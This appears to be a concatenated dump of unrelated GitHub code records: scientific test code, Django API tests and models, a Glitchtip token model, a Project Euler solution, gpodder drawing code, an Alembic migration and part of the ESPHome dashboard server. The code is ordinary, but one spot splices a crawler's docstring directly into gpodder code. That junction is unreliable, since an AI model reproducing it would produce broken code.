**opt_nearest}\n\n X = np.repeat (Xgrid, Ygrid.size)\n Y = np.tile (Ygrid, Xgrid.size)\n Z = np.linspace(0, 50, X .size)\n F, u_F = LT_corr(Z, X, Y), u_LT_corr(Z, X, Y)\n\n # These input values are chosen because they\n # effectively cancel the normalization.\n correct = LifetimeXYCorrection(1 / LTs, u_LTs / LTs**2,\n Xgrid, Ygrid, **kwargs)\n f_corrected, u_corrected = correct(Z, X, Y)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n#--------------------------------------------------------\n\n\n@mark.slow\n@flaky(max_runs=5, min_passes=4)\ndef test_corrections_1d(gauss_data_1d):\n Z, E, Eu, Zevt, Eevt = gauss_data_1d\n\n correct = Correction((Z,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n Eevt *= correct(Zevt).value\n\n mean = np.mean(Eevt)\n std = np.std (Eevt)\n\n y, x = np.histogram(Eevt, np.linspace(mean - 3 * std,\n mean + 3 * std,\n 100))\n x = shift_to_bin_centers(x)\n sigma = poisson_sigma(y)\n f = fitf.fit(fitf.gauss, x, y, (1e5, mean, std), sigma=sigma)\n\n assert 0.75 < f.chi2 < 1.5\n\n\n@mark.slow\n@flaky(max_runs=5, min_passes=4)\ndef test_corrections_2d(gauss_data_2d):\n X, Y, E, Eu, Xevt, Yevt, Eevt = gauss_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (25, 25)},\n **opt_nearest)\n Eevt *= correct(Xevt, Yevt)[0]\n\n mean = np.mean(Eevt)\n std = np.std (Eevt)\n\n y, x = np.histogram(Eevt, np.linspace(mean - 3 * std,\n mean + 3 * std,\n 
100))\n x = shift_to_bin_centers(x)\n sigma = poisson_sigma(y)\n f = fitf.fit(fitf.gauss, x, y, (1e5, mean, std), sigma=sigma)\n\n assert 0.75 < f.chi2 < 1.5\n\n\ndef test_corrections_linear_interpolation():\n # This is the function f(x,y) = x + y on a square grid. Because the\n # interpolation is linear, any point with coordinates (x, y) should\n # yield exactly f(x, y).\n xmin, xmax = 10, 20\n ymin, ymax = 20, 30\n grid_x = np.arange(xmin, xmax+1)\n grid_y = np.arange(ymin, ymax+1)\n grid_points = np.array([(i, j) for i in grid_x\\\n for j in grid_y])\n\n grid_fun = np.sum\n grid_values = np.apply_along_axis(grid_fun, 1, grid_points)\n grid_uncert = np.apply_along_axis(grid_fun, 1, grid_points)/10\n\n correct = Correction((grid_x, grid_y),\n grid_values,\n grid_uncert,\n **opt_linear)\n\n x_test = np.random.uniform(xmin, xmax, size=100)\n y_test = np.random.uniform(ymin, ymax, size=100)\n xy_test = np.stack([x_test, y_test], axis=1)\n\n correction = correct(x_test, y_test)\n expected_values = np.apply_along_axis(grid_fun, 1, xy_test)\n expected_uncert = expected_values/10\n\n assert np.allclose(correction.value , expected_values)\n assert np.allclose(correction.uncertainty, expected_uncert)\n\n\ndef test_corrections_cubic_interpolation():\n # This is the function f(x,y) = x + y on a square grid. Because the\n # interpolation is cubic, any point with coordinates (x, y) should\n # yield exactly f(x, y). This test should probably contain a more\n # complicated function.\n xmin, xmax = 10, 20\n ymin, ymax = 20, 30\n grid_x = np.arange(xmin, xmax + 1)\n grid_y = np.arange(ymin, ymax + 1)\n grid_points = np.array([(i, j) for i in grid_x\\\n for j in grid_y])\n\n grid_fun = np.sum\n grid_values = np.apply_along_axis(grid_fun, 1, grid_points)\n grid_uncert = np.apply_along_axis(grid_fun, 1, grid_points)/10\n\n correct = Correction((grid_x, grid_y),\n grid_values,\n grid_uncert,\n **opt_cubic)\n\n x_test = np.random.uniform(xmin, xmax, size=100)\n y_test = np.random.uniform(ymin, ymax, size=100)\n xy_test = np.stack([x_test, y_test], axis=1)\n\n correction = correct(x_test, y_test)\n expected_values = np.apply_along_axis(grid_fun, 1, xy_test)\n expected_uncert = expected_values/10\n\n assert np.allclose(correction.value , expected_values)\n assert np.allclose(correction.uncertainty, expected_uncert)\n","repo_name":"jmbenlloch/testprod","sub_path":"invisible_cities/reco/corrections_test.py","file_name":"corrections_test.py","file_ext":"py","file_size_in_byte":19395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6599790636","text":"from copy import deepcopy\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\n\nfrom core.tests.base import LibraryManagementBaseTestCase\nfrom library.models import Author\n\n\nclass AuthorAPIEndpointTestCase(LibraryManagementBaseTestCase):\n def setUp(self) -> None:\n super(AuthorAPIEndpointTestCase, self).setUp()\n # Create an author for test\n self.initial_author_data = {\n 'name': 'Iron Fist',\n 'gender': 'Male',\n 'username': 'iron_fist',\n 'password': self.common_passwd,\n 'confirm_password': self.common_passwd,\n }\n _user = User(username='ash_author')\n _user.set_password(raw_password=self.common_passwd)\n _user.save()\n self.author = Author(name='Ashraful Islam', gender='Male')\n self.author.user = _user\n self.author.save()\n\n def test_delete_author_api(self):\n # Login as admin user\n self.login_admin_user()\n response = 
self.client.delete(path=f'/api/authors/{self.author.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n # Login as member user\n self.login_member_user()\n response = self.client.delete(path=f'/api/authors/{self.author.id}/')\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_get_author_api(self):\n # Login as admin user\n self.login_admin_user()\n response = self.client.get(path='/api/authors/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data['results'], list))\n\n # Login as member user\n self.login_member_user()\n response = self.client.get(path='/api/authors/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data['results'], list))\n\n def test_post_author_api(self):\n self.login_admin_user()\n _data = deepcopy(self.initial_author_data)\n response = self.client.post(path='/api/authors/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(isinstance(response.data, dict))\n self.assertEqual(response.data['name'], _data['name'])\n self.assertEqual(response.data['gender'], _data['gender'])\n\n # Login as member user\n self.login_member_user()\n _data = deepcopy(self.initial_author_data)\n response = self.client.post(path='/api/authors/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_put_author_api(self):\n self.login_admin_user()\n _data = deepcopy(self.initial_author_data)\n _data['name'] = 'Allison Argent'\n _data['gender'] = 'Female'\n response = self.client.put(path=f'/api/authors/{self.author.id}/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data, dict))\n self.assertNotEqual(response.data['name'], self.author.name) # not matched with old title\n self.assertNotEqual(response.data['gender'], self.author.gender) # not matched with old description\n self.assertEqual(response.data['name'], _data['name']) # Updated name matched\n self.assertEqual(response.data['gender'], _data['gender']) # Updated name matched\n\n # Login as member user\n self.login_member_user()\n _data = deepcopy(self.initial_author_data)\n _data['name'] = 'Allison Argent'\n _data['gender'] = 'Female'\n response = self.client.put(path=f'/api/authors/{self.author.id}/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n","repo_name":"iashraful/interview-evaly-book-library-api","sub_path":"library/tests/tests_author_api_endpoints.py","file_name":"tests_author_api_endpoints.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71432917374","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\nfrom django.utils import timezone\n\n# 用户\nfrom iLab import settings\n\n\nclass User(AbstractUser):\n is_approved = models.BooleanField(default=False) # 是否为已通过审核的正式成员\n\n\n# 公告\nclass Notice(models.Model):\n title = models.CharField(max_length=255) # 公告标题\n content = models.TextField() # 公告内容\n publish_time = models.DateTimeField(default=timezone.now) # 发布时间\n edit_time = models.DateTimeField(auto_now=True) # 最后编辑时间\n priority = models.SmallIntegerField(default=1) # 公告优先级 越大优先级越高 0为禁用\n publisher = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) # 发布者\n\n\n# 正式成员信息(档案)\nclass Archive(models.Model):\n user = 
models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) # 关联的用户(一对一)\n student_num = models.CharField(max_length=32, unique=True, null=True) # 学号\n name = models.CharField(max_length=16, null=True) # 真实姓名\n mobile_num = models.CharField(max_length=20, unique=True, null=True) # 手机号\n","repo_name":"Ginakira/Labman","sub_path":"labman/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74340076736","text":"import binascii\nimport os\nfrom typing import List\n\nfrom django.conf import settings\nfrom django.db import models\n\nfrom bitfield import BitField\n\nfrom glitchtip.base_models import CreatedModel\n\n\ndef generate_token():\n return binascii.hexlify(os.urandom(32)).decode()\n\n\nclass APIToken(CreatedModel):\n \"\"\"\n Ideas borrowed from rest_framework.authtoken and sentry.apitoken\n \"\"\"\n\n token = models.CharField(\n max_length=64, unique=True, editable=False, default=generate_token\n )\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n label = models.CharField(max_length=255, blank=True)\n scopes = BitField(\n flags=(\n \"project:read\",\n \"project:write\",\n \"project:admin\",\n \"project:releases\",\n \"team:read\",\n \"team:write\",\n \"team:admin\",\n \"event:read\",\n \"event:write\",\n \"event:admin\",\n \"org:read\",\n \"org:write\",\n \"org:admin\",\n \"member:read\",\n \"member:write\",\n \"member:admin\",\n )\n )\n\n def __str__(self):\n return self.token\n\n def get_scopes(self):\n \"\"\"\n Return array of set scope flags.\n Example: [\"project:read\"]\n \"\"\"\n return [i[0] for i in self.scopes.items() if i[1] is True]\n\n def add_permission(self, permission: str):\n \"\"\" Add permission flag to scopes and save \"\"\"\n setattr(self.scopes, permission, True)\n self.save(update_fields=[\"scopes\"])\n\n def add_permissions(self, permissions: List[str]):\n \"\"\" Add permission flags to scopes and save \"\"\"\n for permission in permissions:\n setattr(self.scopes, permission, True)\n self.save(update_fields=[\"scopes\"])\n","repo_name":"diwaperkasa/glitchtip","sub_path":"code/api_tokens/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22771524731","text":"from collections import deque\n\ndef search(lines,pattern,history=5):\n\tprevious_lines = deque(maxlen=history)\n\tfor line in lines:\n\t\tif pattern in line:\n\t\t\tyield line,previous_lines\n\t\tprevious_lines.append(line)\n\t\t\n\t\t\n\n\"\"\"Using deque(maxlen=N) creates a fixed-sized queue. 
When new items are added and the queue is full, the oldest item is automatically removed\"\"\"\nq = deque(maxlen=3)\nq.append(3)\nq.append(1)\nq.append(2)\nprint(q)\n\nq.append(4)\nq.append(5)\nprint(q)\nq.appendleft(7)\nprint(q)\t\nq.popleft()\nprint(q)\t\nq.pop()\nprint(q)\nq.extend('werwe')\nprint(q)\t\nq.rotate(1)\nprint(q)\nq.rotate(2)\nprint(q)\t\n\t\t\nif __name__=='__main__':\n\twith open('test.txt') as f:\n\t\tfor line,previous_lines in search(f,' is ',5):\n\t\t\tfor pline in previous_lines:\n\t\t\t\tprint(pline,end='')\n\t\t\tprint(line,end='')\n\t\t\tprint('-'*20)","repo_name":"ishank296/python-cookbook","sub_path":"Chapter_1/keeping_last_n_elements.py","file_name":"keeping_last_n_elements.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19686729409","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\n\nclass ContentCrawler:\n \"\"\"\n Crawler to crawl all the visible text data from a given page, without stripping the white spaces and \n removing the stop words.\n \n \"\"\"\n def __init__(self, target_url):\n \"\"\"\n Create an ContentCrawler instance from target_url \n \n :param target_url: url of the page to scrape from\n :type target_url: str\n \"\"\"\n self.__target_url = target_url\n\n @staticmethod\n def filter_invalid_str(s):\n \"\"\"\n Filter out comment strings and strings whose parents tags are \n \"\"\")\n for type_and_class, w in type_classes_and_widgets:\n f.write(\"\\n\")\n f.write(\"
\\n\")\n # Create an empty style context\n style_ctx = Gtk.StyleContext()\n # Create an empty widget path\n widget_path = Gtk.WidgetPath()\n # Specify the widget class type you want to get colors from\n for t, c, r in type_and_class:\n widget_path.append_type(t)\n if c:\n widget_path.iter_add_class(widget_path.length() - 1, c)\n if r:\n widget_path.iter_add_region(widget_path.length() - 1, r, 0)\n style_ctx.set_path(widget_path)\n\n investigate_stylecontext(\n style_ctx,\n 'STATIC {}'.format(' '.join('{}.{}({})'.format(t.__name__, c, r) for t, c, r in type_and_class)))\n\n f.write(\"
\\n\")\n\n investigate_stylecontext(w.get_style_context(), 'LIVE {}'.format(type(w).__name__))\n\n f.write(\"
\\n\")\n\n\ndef draw_iconcell_scale(column, cell, model, iter, scale):\n \"\"\"\n Draw cell's pixbuf to a surface with proper scaling for high resolution\n displays. To be used as gtk.TreeViewColumn.set_cell_data_func.\n\n :param column: gtk.TreeViewColumn (ignored)\n :param cell: gtk.CellRenderer\n :param model: gtk.TreeModel (ignored)\n :param iter: gtk.TreeIter (ignored)\n :param scale: factor of the target display (e.g. 1 or 2)\n \"\"\"\n pixbuf = cell.props.pixbuf\n if not pixbuf:\n return\n\n width = pixbuf.get_width()\n height = pixbuf.get_height()\n scale_inv = 1 / scale\n\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)\n surface.set_device_scale(scale, scale)\n\n cr = cairo.Context(surface)\n cr.scale(scale_inv, scale_inv)\n Gdk.cairo_set_source_pixbuf(cr, cell.props.pixbuf, 0, 0)\n cr.paint()\n\n cell.props.surface = surface\n","repo_name":"gpodder/gpodder","sub_path":"src/gpodder/gtkui/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":18559,"program_lang":"python","lang":"en","doc_type":"code","stars":1186,"dataset":"github-code","pt":"7"} +{"seq_id":"30638526166","text":"\"\"\"create_initial_database\n\nRevision ID: 4c76c573a64e\nRevises: \nCreate Date: 2021-08-23 20:38:20.209148\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '4c76c573a64e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('ingredients',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', mysql.VARCHAR(length=128), nullable=True),\n sa.Column('price', mysql.DOUBLE(asdecimal=True), nullable=True),\n sa.Column('quantity', mysql.INTEGER(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('pizza',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', mysql.VARCHAR(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('pizza_ingredients',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('pizza_id', mysql.INTEGER(), nullable=True),\n sa.Column('ingredient_id', mysql.INTEGER(), nullable=True),\n sa.Column('quantity', mysql.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['ingredient_id'], ['ingredients.id'], ),\n sa.ForeignKeyConstraint(['pizza_id'], ['pizza.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('pizza_ingredients')\n op.drop_table('pizza')\n op.drop_table('ingredients')\n # ### end Alembic commands ###\n","repo_name":"mihaitzzza/nt-06-python","sub_path":"desktop-apps/migrations/versions/4c76c573a64e_create_initial_database.py","file_name":"4c76c573a64e_create_initial_database.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"23831785230","text":"'''\nCreated on 2013-04-05\n\nProblem 26:\nA unit fraction contains 1 in the numerator. 
The decimal representation of the unit fractions with denominators 2 to 10 are given:\n\n1/2 = 0.5\n1/3 = 0.(3)\n1/4 = 0.25\n1/5 = 0.2\n1/6 = 0.1(6)\n1/7 = 0.(142857)\n1/8 = 0.125\n1/9 = 0.(1)\n1/10 = 0.1\n\nWhere 0.1(6) means 0.166666..., and has a 1-digit recurring cycle. It can be seen that 1/7 has a 6-digit recurring cycle.\n\nFind the value of d < 1000 for which 1/d has the longest recurring cycle in its decimal fraction part.\n\nSOLUTION: 983\n@author: Jason Baker\n'''\n\ndef factor(N):\n factors = []\n \n for i in range(2, N):\n while(N % i == 0):\n factors.append(i)\n N = N/i\n if N == 1: break\n return factors\n\ndef isPrime(num):\n return len(factor(num)) == 0\n\ndef primeFactorization(N):\n result = []\n \n for i in range(2, N):\n if(N % i == 0) and isPrime(i):\n k = 1\n tmp = int( N/i )\n \n while(tmp/i % 1 == 0):\n k += 1\n tmp = int( tmp/i )\n result += [[i, k]]\n \n return result\n\ndef genNines(nines):\n return (10 * nines) + 9\n\ndef gcd(a, b):\n if a < b: return gcd(b, a)\n elif b == 0: return a\n else:\n return gcd(b, a%b)\n \ndef lcm(a, b):\n return int( (a/gcd(a, b)) * b )\n\n# Finally getting more use out of this LCM function\ndef multLcm(nums):\n if len(nums) == 1:\n return nums[0]\n if len(nums) == 2:\n return lcm(nums[0], nums[1])\n else:\n return lcm(multLcm(nums[1:]), nums[0])\n \ndef findPeriod(denominator):\n factors = primeFactorization(denominator)\n # These are all the terminating decimals, so they have no recurring cycles\n if denominator == 2 or denominator == 5 or (len(factors) == 1 and (factors[0][0] == 2 or factors[0][0] == 5)) or (len(factors) == 2 and factors[0][0] == 2 and factors[1][0] == 5):\n return 0\n # Let's check the primitive primes\n elif len(factors) == 0:\n i = 1\n nines = genNines(0)\n \n while(nines%denominator > 0):\n i += 1\n nines = genNines(nines)\n \n return i\n # Now for composite numbers\n else:\n # Fun property of integers not co-prime to 10: when you strip out the 2s and 5s, they're just like any others\n if denominator % 2 == 0 or denominator % 5 == 0:\n while denominator/2 % 1 == 0:\n denominator = int( denominator/2 )\n while denominator/5 % 1 == 0:\n denominator = int( denominator/5 )\n return findPeriod(denominator)\n \n # Some special cases that require special handling\n if denominator == 3:\n return 1\n elif denominator == 487:\n return 486\n # Now we can get to the real meat of the algorithm\n primePeriods = []\n \n for f in factors:\n # 3 is still a special case\n if f[0] == 3:\n if f[1] == 1:\n primePeriods += [1]\n else:\n primePeriods += [ f[0]**(f[1] - 2) ]\n else:\n # A funny little property that makes this algorithm nice and quick\n primePeriods += [ f[0]**(f[1] - 1) * findPeriod(f[0]) ]\n return multLcm(primePeriods)\n\n#print(findPeriod(867))\nlargestCycle = 0\nd = 0\n\nfor i in range(2, 1000):\n cycle = findPeriod(i)\n if cycle > largestCycle:\n largestCycle = cycle\n d = i\n \nprint(d)","repo_name":"jwbaker/projecteuler","sub_path":"PE26.py","file_name":"PE26.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24152204579","text":"import tkinter.ttk as ttk\n\n\nclass MenuFrame(ttk.Frame):\n def __init__(self, top, frames):\n ttk.Frame.__init__(self, top)\n self.frames = frames\n self.top = top\n zgo_btn = ttk.Button(self)\n zgo_btn.configure(text=\"ZGO\",\n command=lambda: self.change_frame(frames[0]))\n zgo_btn.grid()\n zgz_btn = ttk.Button(self)\n zgz_btn.configure(text=\"ZGZ\",\n command=lambda: 
self.change_frame(frames[1]))\n zgz_btn.grid(column=1, row=0)\n draft_btn = ttk.Button(self)\n draft_btn.configure(text=\"Ciąg\",\n command=lambda: self.change_frame(frames[2]))\n draft_btn.grid(column=2, row=0)\n config_btn = ttk.Button(self)\n config_btn.configure(text=\"Konfiguracja\",\n command=lambda: self.change_frame(frames[3]))\n config_btn.grid(column=3, row=0)\n\n def change_frame(self, new_frame):\n for frame in self.frames:\n frame.grid_forget()\n new_frame.grid(column=0, row=1, sticky=\"W\")\n","repo_name":"Matexer/TopoCal","sub_path":"gui/frames/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9529910559","text":"# pylint: disable=wrong-import-position\n\nimport codecs\nimport collections\nimport functools\nimport hashlib\nimport hmac\nimport json\nimport logging\nimport multiprocessing\nimport os\nimport shutil\nimport subprocess\nimport threading\n\nimport tornado\nimport tornado.concurrent\nimport tornado.gen\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.iostream\nfrom tornado.log import access_log\nimport tornado.netutil\nimport tornado.process\nimport tornado.web\nimport tornado.websocket\n\nfrom esphome import const, util\nfrom esphome.__main__ import get_serial_ports\nfrom esphome.helpers import mkdir_p, get_bool_env, run_system_command\nfrom esphome.storage_json import EsphomeStorageJSON, StorageJSON, \\\n esphome_storage_path, ext_storage_path, trash_storage_path\nfrom esphome.util import shlex_quote\n\n# pylint: disable=unused-import, wrong-import-order\nfrom typing import Optional # noqa\n\nfrom esphome.zeroconf import DashboardStatus, Zeroconf\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass DashboardSettings:\n def __init__(self):\n self.config_dir = ''\n self.password_digest = ''\n self.username = ''\n self.using_password = False\n self.on_hassio = False\n self.cookie_secret = None\n\n def parse_args(self, args):\n self.on_hassio = args.hassio\n password = args.password or os.getenv('PASSWORD', '')\n if not self.on_hassio:\n self.username = args.username or os.getenv('USERNAME', '')\n self.using_password = bool(password)\n if self.using_password:\n self.password_digest = hmac.new(password.encode()).digest()\n self.config_dir = args.configuration[0]\n\n @property\n def relative_url(self):\n return os.getenv('ESPHOME_DASHBOARD_RELATIVE_URL', '/')\n\n @property\n def status_use_ping(self):\n return get_bool_env('ESPHOME_DASHBOARD_USE_PING')\n\n @property\n def using_hassio_auth(self):\n if not self.on_hassio:\n return False\n return not get_bool_env('DISABLE_HA_AUTHENTICATION')\n\n @property\n def using_auth(self):\n return self.using_password or self.using_hassio_auth\n\n def check_password(self, username, password):\n if not self.using_auth:\n return True\n if username != self.username:\n return False\n\n password = hmac.new(password.encode()).digest()\n return username == self.username and hmac.compare_digest(self.password_digest, password)\n\n def rel_path(self, *args):\n return os.path.join(self.config_dir, *args)\n\n def list_yaml_files(self):\n return util.list_yaml_files(self.config_dir)\n\n\nsettings = DashboardSettings()\n\ncookie_authenticated_yes = b'yes'\n\n\ndef template_args():\n version = const.__version__\n return {\n 'version': version,\n 'docs_link': 'https://beta.esphome.io/' if 'b' in version else 'https://esphome.io/',\n 'get_static_file_url': get_static_file_url,\n 'relative_url': 
settings.relative_url,\n 'streamer_mode': get_bool_env('ESPHOME_STREAMER_MODE'),\n 'config_dir': settings.config_dir,\n }\n\n\ndef authenticated(func):\n @functools.wraps(func)\n def decorator(self, *args, **kwargs):\n if not is_authenticated(self):\n self.redirect('./login')\n return None\n return func(self, *args, **kwargs)\n return decorator\n\n\ndef is_authenticated(request_handler):\n if settings.on_hassio:\n # Handle ingress - disable auth on ingress port\n # X-Hassio-Ingress is automatically stripped on the non-ingress server in nginx\n header = request_handler.request.headers.get('X-Hassio-Ingress', 'NO')\n if str(header) == 'YES':\n return True\n if settings.using_auth:\n return request_handler.get_secure_cookie('authenticated') == cookie_authenticated_yes\n return True\n\n\ndef bind_config(func):\n def decorator(self, *args, **kwargs):\n configuration = self.get_argument('configuration')\n if not is_allowed(configuration):\n self.set_status(500)\n return None\n kwargs = kwargs.copy()\n kwargs['configuration'] = configuration\n return func(self, *args, **kwargs)\n return decorator\n\n\n# pylint: disable=abstract-method\nclass BaseHandler(tornado.web.RequestHandler):\n pass\n\n\ndef websocket_class(cls):\n # pylint: disable=protected-access\n if not hasattr(cls, '_message_handlers'):\n cls._message_handlers = {}\n\n for _, method in cls.__dict__.items():\n if hasattr(method, \"_message_handler\"):\n cls._message_handlers[method._message_handler] = method\n\n return cls\n\n\ndef websocket_method(name):\n def wrap(fn):\n # pylint: disable=protected-access\n fn._message_handler = name\n return fn\n return wrap\n\n\n# pylint: disable=abstract-method, arguments-differ\n@websocket_class\nclass EsphomeCommandWebSocket(tornado.websocket.WebSocketHandler):\n def __init__(self, application, request, **kwargs):\n super().__init__(application, request, **kwargs)\n self._proc = None\n self._is_closed = False\n\n @authenticated\n def on_message(self, message):\n # Messages are always JSON, 500 when not\n json_message = json.loads(message)\n type_ = json_message['type']\n # pylint: disable=no-member\n handlers = type(self)._message_handlers\n if type_ not in handlers:\n _LOGGER.warning(\"Requested unknown message type %s\", type_)\n return\n\n handlers[type_](self, json_message)\n\n @websocket_method('spawn')\n def handle_spawn(self, json_message):\n if self._proc is not None:\n # spawn can only be called once\n return\n command = self.build_command(json_message)\n _LOGGER.info(\"Running command '%s'\", ' '.join(shlex_quote(x) for x in command))\n self._proc = tornado.process.Subprocess(command,\n stdout=tornado.process.Subprocess.STREAM,\n stderr=subprocess.STDOUT,\n stdin=tornado.process.Subprocess.STREAM)\n self._proc.set_exit_callback(self._proc_on_exit)\n tornado.ioloop.IOLoop.current().spawn_callback(self._redirect_stdout)\n\n @property\n def is_process_active(self):\n return self._proc is not None and self._proc.returncode is None\n\n @websocket_method('stdin')\n def handle_stdin(self, json_message):\n if not self.is_process_active:\n return\n data = json_message['data']\n data = codecs.encode(data, 'utf8', 'replace')\n _LOGGER.debug(\"< stdin: %s\", data)\n self._proc.stdin.write(data)\n\n @tornado.gen.coroutine\n def _redirect_stdout(self):\n reg = b'[\\n\\r]'\n\n while True:\n try:\n data = yield self._proc.stdout.read_until_regex(reg)\n except tornado.iostream.StreamClosedError:\n break\n data = codecs.decode(data, 'utf8', 'replace')\n\n _LOGGER.debug(\"> stdout: %s\", data)\n 
self.write_message({'event': 'line', 'data': data})\n\n def _proc_on_exit(self, returncode):\n if not self._is_closed:\n # Check if the proc was not forcibly closed\n _LOGGER.info(\"Process exited with return code %s\", returncode)\n self.write_message({'event': 'exit', 'code': returncode})\n\n def on_close(self):\n # Check if proc exists (if 'start' has been run)\n if self.is_process_active:\n _LOGGER.debug(\"Terminating process\")\n self._proc.proc.terminate()\n # Shutdown proc on WS close\n self._is_closed = True\n\n def build_command(self, json_message):\n raise NotImplementedError\n\n\nclass EsphomeLogsHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"logs\", '--serial-port',\n json_message[\"port\"]]\n\n\nclass EsphomeUploadHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"run\", '--upload-port',\n json_message[\"port\"]]\n\n\nclass EsphomeCompileHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"compile\"]\n\n\nclass EsphomeValidateHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"config\"]\n\n\nclass EsphomeCleanMqttHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"clean-mqtt\"]\n\n\nclass EsphomeCleanHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"clean\"]\n\n\nclass EsphomeVscodeHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", \"-q\", 'dummy', \"vscode\"]\n\n\nclass EsphomeAceEditorHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", \"-q\", settings.config_dir, \"vscode\", \"--ace\"]\n\n\nclass EsphomeUpdateAllHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", settings.config_dir, \"update-all\"]\n\n\nclass SerialPortRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n ports = get_serial_ports()\n data = []\n for port, desc in ports:\n if port == '/dev/ttyAMA0':\n desc = 'UART pins on GPIO header'\n split_desc = desc.split(' - ')\n if len(split_desc) == 2 and split_desc[0] == split_desc[1]:\n # Some serial ports repeat their values\n desc = split_desc[0]\n data.append({'port': port, 'desc': desc})\n data.append({'port': 'OTA', 'desc': 'Over-The-Air'})\n data.sort(key=lambda x: x['port'], reverse=True)\n self.write(json.dumps(data))\n\n\nclass WizardRequestHandler(BaseHandler):\n @authenticated\n def post(self):\n from esphome import wizard\n\n kwargs = {\n k: ''.join(x.decode() for x in v)\n for k, v in self.request.arguments.items()\n }\n destination = settings.rel_path(kwargs['name'] + '.yaml')\n wizard.wizard_write(path=destination, **kwargs)\n self.redirect('./?begin=True')\n\n\nclass 
